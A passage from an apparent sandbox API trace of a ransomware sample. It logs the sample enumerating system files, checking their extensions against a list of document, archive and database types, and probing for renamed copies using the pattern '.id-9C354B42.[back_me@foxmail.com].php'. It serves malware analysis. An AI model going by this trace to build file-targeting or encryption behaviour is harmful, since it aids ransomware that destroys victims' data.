(lpString1=".bz2", lpString2=".avi") returned 1 [0242.017] lstrlenW (lpString=".7z") returned 3 [0242.017] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0242.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0242.017] lstrlenW (lpString=".dbf") returned 4 [0242.017] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0242.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0242.017] lstrlenW (lpString=".1cd") returned 4 [0242.017] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0242.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0242.017] lstrlenW (lpString=".jpg") returned 4 [0242.017] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0242.017] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0242.017] lstrlenW (lpString="oskmenubase.xml") returned 15 [0242.017] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0242.200] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x31aff1c | out: lpFileSize=0x31aff1c*=471) returned 1 [0242.200] CloseHandle (hObject=0x240) returned 1 [0242.201] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml")) returned 0x20 [0242.201] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0242.201] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0242.201] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0242.201] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0242.201] lstrlenW (lpString=".doc") returned 4 [0242.201] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0242.201] lstrlenW (lpString=".docx") returned 5 [0242.201] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0242.201] lstrlenW (lpString=".pdf") returned 4 [0242.201] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0242.201] lstrlenW (lpString=".xls") returned 4 [0242.201] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0242.201] lstrlenW (lpString=".xlsx") returned 5 [0242.201] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0242.201] lstrlenW (lpString=".ppt") returned 4 [0242.201] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0242.201] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0242.201] lstrlenW (lpString=".zip") returned 4 [0242.201] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0242.201] lstrlenW (lpString=".rar") returned 4 [0242.201] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0242.202] lstrlenW (lpString=".bz2") returned 4 [0242.202] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0242.202] lstrlenW (lpString=".7z") returned 3 [0242.202] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0242.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0242.202] lstrlenW (lpString=".dbf") returned 4 [0242.202] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0242.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0242.202] lstrlenW (lpString=".1cd") returned 4 [0242.202] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0242.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0242.202] lstrlenW (lpString=".jpg") returned 4 [0242.202] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0242.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0242.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0242.202] lstrlenW (lpString=".doc") returned 4 [0242.202] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0242.202] lstrlenW (lpString=".docx") returned 5 [0242.202] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0242.202] lstrlenW (lpString=".pdf") returned 4 [0242.202] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0242.202] lstrlenW (lpString=".xls") returned 4 [0242.202] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0242.202] lstrlenW (lpString=".xlsx") returned 5 [0242.202] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0242.202] lstrlenW (lpString=".ppt") returned 4 [0242.202] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0242.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0242.203] lstrlenW (lpString=".zip") returned 4 [0242.203] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0242.203] lstrlenW (lpString=".rar") returned 4 [0242.203] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0242.203] lstrlenW (lpString=".bz2") returned 4 [0242.203] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0242.203] lstrlenW (lpString=".7z") returned 3 [0242.203] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0242.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0242.203] lstrlenW (lpString=".dbf") returned 4 [0242.203] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0242.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0242.203] lstrlenW (lpString=".1cd") returned 4 [0242.203] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0242.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0242.203] lstrlenW (lpString=".jpg") returned 4 [0242.203] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0242.203] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0242.203] lstrlenW (lpString="osknumpad.xml") returned 13 [0242.203] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0242.531] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x31aff1c | out: lpFileSize=0x31aff1c*=219) returned 1 [0242.531] CloseHandle (hObject=0x370) returned 1 [0242.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml")) returned 0x20 [0242.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0242.531] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0242.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0242.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0242.532] lstrlenW (lpString=".doc") returned 4 [0242.532] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0242.532] lstrlenW (lpString=".docx") returned 5 [0242.532] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0242.532] lstrlenW (lpString=".pdf") returned 4 [0242.532] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0242.532] lstrlenW (lpString=".xls") returned 4 [0242.532] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0242.532] lstrlenW (lpString=".xlsx") returned 5 [0242.532] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0242.532] lstrlenW (lpString=".ppt") returned 4 [0242.532] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0242.532] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0242.532] lstrlenW (lpString=".zip") returned 4 [0242.532] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0242.532] lstrlenW (lpString=".rar") returned 4 [0242.532] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0242.532] lstrlenW (lpString=".bz2") returned 4 [0242.532] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0242.532] lstrlenW (lpString=".7z") returned 3 [0242.532] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0242.532] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0242.532] lstrlenW (lpString=".dbf") returned 4 [0242.532] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 Thread: id = 56 os_tid = 0x628 [0241.362] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3d23dc8 [0241.362] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3d33dd0 [0241.362] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e0a8 [0241.362] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x6) returned 0xb99c30 [0241.362] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e0c0 [0241.362] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x100000) returned 0x4010020 [0241.362] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e0d8 [0241.362] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9e0d8, Size=0x20) returned 0xbbdc98 [0241.363] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e0d8 [0241.363] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9e0d8, Size=0x20) returned 0xbbdcc0 [0241.363] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0241.363] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0241.363] Wow64DisableWow64FsRedirection (in: OldValue=0x32eff58 | out: OldValue=0x32eff58*=0x0) returned 1 [0241.363] lstrlenW (lpString="kernel32.dll") returned 12 [0241.363] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbbdc98 | out: hHeap=0xb00000) returned 1 [0241.363] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0241.363] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbbdcc0 | out: hHeap=0xb00000) returned 1 [0241.363] Sleep (dwMilliseconds=0x64) [0241.556] lstrlenW (lpString="BCD") returned 3 [0241.556] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.560] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0241.560] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0241.560] lstrlenW (lpString=".doc") returned 4 [0241.560] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0241.560] lstrlenW (lpString=".docx") returned 5 [0241.560] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0241.560] lstrlenW (lpString=".pdf") returned 4 [0241.560] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0241.560] lstrlenW (lpString=".xls") returned 4 [0241.560] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0241.560] lstrlenW (lpString=".xlsx") returned 5 [0241.560] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0241.560] lstrlenW (lpString=".ppt") returned 4 [0241.561] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0241.561] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0241.561] lstrlenW (lpString=".zip") returned 4 [0241.561] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0241.561] lstrlenW (lpString=".rar") returned 4 [0241.561] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0241.561] lstrlenW (lpString=".bz2") returned 4 [0241.561] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0241.561] lstrlenW (lpString=".7z") returned 3 [0241.561] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0241.561] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0241.561] lstrlenW (lpString=".dbf") returned 4 [0241.561] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0241.561] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0241.561] lstrlenW (lpString=".1cd") returned 4 [0241.561] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0241.561] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0241.561] lstrlenW (lpString=".jpg") returned 4 [0241.561] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0241.561] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0241.561] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0241.561] lstrlenW (lpString=".doc") returned 4 [0241.561] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0241.561] lstrlenW (lpString=".docx") returned 5 [0241.561] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0241.561] lstrlenW (lpString=".pdf") returned 4 [0241.561] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0241.561] lstrlenW (lpString=".xls") returned 4 [0241.561] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0241.561] lstrlenW (lpString=".xlsx") returned 5 [0241.562] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0241.562] lstrlenW (lpString=".ppt") returned 4 [0241.562] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0241.562] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0241.562] lstrlenW (lpString=".zip") returned 4 [0241.562] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0241.562] lstrlenW (lpString=".rar") returned 4 [0241.562] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0241.562] lstrlenW (lpString=".bz2") returned 4 [0241.562] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0241.562] lstrlenW (lpString=".7z") returned 3 [0241.562] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0241.562] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0241.562] lstrlenW (lpString=".dbf") returned 4 [0241.562] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0241.562] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0241.562] lstrlenW (lpString=".1cd") returned 4 [0241.562] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0241.562] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0241.562] lstrlenW (lpString=".jpg") returned 4 [0241.562] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0241.562] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.562] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0241.562] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.563] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x32eff1c | out: lpFileSize=0x32eff1c*=87616) returned 1 [0241.563] CloseHandle (hObject=0x244) returned 1 [0241.563] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0241.563] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.563] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.563] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0241.563] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0241.563] lstrlenW (lpString=".doc") returned 4 [0241.563] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.563] lstrlenW (lpString=".docx") returned 5 [0241.563] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.563] lstrlenW (lpString=".pdf") returned 4 [0241.563] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.563] lstrlenW (lpString=".xls") returned 4 [0241.563] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.563] lstrlenW (lpString=".xlsx") returned 5 [0241.563] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.563] lstrlenW (lpString=".ppt") returned 4 [0241.563] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.563] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0241.563] lstrlenW (lpString=".zip") returned 4 [0241.563] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.563] lstrlenW (lpString=".rar") returned 4 [0241.563] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.563] lstrlenW (lpString=".bz2") returned 4 [0241.563] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.564] lstrlenW (lpString=".7z") returned 3 [0241.564] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.564] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0241.564] lstrlenW (lpString=".dbf") returned 4 [0241.564] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.564] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0241.564] lstrlenW (lpString=".1cd") returned 4 [0241.564] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.564] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0241.564] lstrlenW (lpString=".jpg") returned 4 [0241.564] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.564] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0241.564] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0241.564] lstrlenW (lpString=".doc") returned 4 [0241.564] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.564] lstrlenW (lpString=".docx") returned 5 [0241.564] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.564] lstrlenW (lpString=".pdf") returned 4 [0241.564] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.564] lstrlenW (lpString=".xls") returned 4 [0241.564] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.564] lstrlenW (lpString=".xlsx") returned 5 [0241.564] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.564] lstrlenW (lpString=".ppt") returned 4 [0241.564] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.564] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0241.564] lstrlenW (lpString=".zip") returned 4 [0241.564] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.564] lstrlenW (lpString=".rar") returned 4 [0241.564] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.564] lstrlenW (lpString=".bz2") returned 4 [0241.565] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.565] lstrlenW (lpString=".7z") returned 3 [0241.565] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.565] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0241.565] lstrlenW (lpString=".dbf") returned 4 [0241.565] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.565] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0241.565] lstrlenW (lpString=".1cd") returned 4 [0241.565] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.565] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0241.565] lstrlenW (lpString=".jpg") returned 4 [0241.565] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.565] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.565] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0241.565] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.565] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x32eff1c | out: lpFileSize=0x32eff1c*=91712) returned 1 [0241.565] CloseHandle (hObject=0x244) returned 1 [0241.565] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0241.565] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.565] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.566] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0241.566] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0241.566] lstrlenW (lpString=".doc") returned 4 [0241.566] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.566] lstrlenW (lpString=".docx") returned 5 [0241.566] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.566] lstrlenW (lpString=".pdf") returned 4 [0241.566] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.566] lstrlenW (lpString=".xls") returned 4 [0241.566] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.566] lstrlenW (lpString=".xlsx") returned 5 [0241.566] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.566] lstrlenW (lpString=".ppt") returned 4 [0241.566] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.566] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0241.566] lstrlenW (lpString=".zip") returned 4 [0241.566] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.566] lstrlenW (lpString=".rar") returned 4 [0241.566] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.566] lstrlenW (lpString=".bz2") returned 4 [0241.566] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.566] lstrlenW (lpString=".7z") returned 3 [0241.566] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.566] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0241.566] lstrlenW (lpString=".dbf") returned 4 [0241.566] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.566] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0241.566] lstrlenW (lpString=".1cd") returned 4 [0241.566] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.566] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0241.566] lstrlenW (lpString=".jpg") returned 4 [0241.566] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.567] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0241.567] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0241.567] lstrlenW (lpString=".doc") returned 4 [0241.567] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.567] lstrlenW (lpString=".docx") returned 5 [0241.567] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.567] lstrlenW (lpString=".pdf") returned 4 [0241.567] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.567] lstrlenW (lpString=".xls") returned 4 [0241.567] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.567] lstrlenW (lpString=".xlsx") returned 5 [0241.567] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.567] lstrlenW (lpString=".ppt") returned 4 [0241.567] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.567] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0241.567] lstrlenW (lpString=".zip") returned 4 [0241.567] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.567] lstrlenW (lpString=".rar") returned 4 [0241.567] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.567] lstrlenW (lpString=".bz2") returned 4 [0241.567] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.567] lstrlenW (lpString=".7z") returned 3 [0241.567] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.567] lstrlenW 